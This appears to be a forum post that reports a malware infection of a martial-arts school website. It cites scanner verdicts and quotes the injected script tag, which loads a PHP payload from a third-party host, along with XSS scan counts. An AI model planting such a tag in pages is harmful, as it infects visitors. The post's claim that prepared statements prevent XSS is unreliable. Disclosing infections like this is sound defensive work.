avast! Webshield detects JS:Includer-BBV[Trj] here:
https://www.virustotal.com/nl/url/78e665aa395373aadbddc8686f5f5f932a4fa394fe57513d96550822f40bc00b/analysis/1413210090/and this is confirmed here:
https://www.virustotal.com/nl/file/060d6d4f575a169f5f3984e6778626957606e0fbba145bdd612622780a712bb0/analysis/1413156382/Quttera and yandex blacklisted:
http://yandex.com/infected?l10n=en&url=universalkungfu.comMa;ware flagged by Sucuri's"
ISSUE DETECTED DEFINITION INFECTED URL
Website Malware mwjs-iframe-injected691?v24 htxp://universalkungfu.com
Website Malware mwjs-iframe-injected691?v24 htxp://universalkungfu.com/index.html
Website Malware mwjs-iframe-injected691?v24 htxp://universalkungfu.com/dojazd.html
Website Malware mwjs-iframe-injected691?v24 htxp://universalkungfu.com/system.html
Website Malware mwjs-iframe-injected691?v24 htxp://universalkungfu.com/artykuly.html
Website Malware mwjs-iframe-injected691?v24 htxp://universalkungfu.com/aktualnosci.html
Known javascript malware. Details:
http://labs.sucuri.net/db/malware/mwjs-iframe-injected691?v24 </div><!--932288--><script type="text/javascript" src=
"htxp://jamolandia.com/DQ8KjcH4.php?id=12558602"></script><!--/932288-->
XSS vulnerable: Results from scanning URL: htxp://jamolandia.com
Number of sources found: 5
Number of sinks found: 483
Results from scanning URL: htxp://jamolandia.com/media/system/js/caption.js
Number of sources found: 5
Number of sinks found: 12
Results from scanning URL: htxp://jamolandia.com/media/system/js/mootools-more.js
Number of sources found: 65
Number of sinks found: 13
Results from scanning URL: htxp://jamolandia.com/templates/smart_news25/js/yt-script.js
Number of sources found: 92
Number of sinks found: 5
Results from scanning URL: htxp://jamolandia.com/templates/smart_news25/menusys/class/mega/assets/megalib.js
Number of sources found: 40
Number of sinks found: 13
Results from scanning URL: htxp://jamolandia.com/modules/mod_sj_news_ajax_tabs/assets/js/jsmart.ajaxtabs.js
Number of sources found: 17
Number of sinks found: 7
Results from scanning URL: htxp://jamolandia.com/media/system/js/validate.js
Number of sources found: 9
Number of sinks found: 7
Best protection against these possible cross-site-scripting vulnerabilities would be the use of prepared statements.
The basic idea behind this is that the query and the data are sent to the server separately.
polonus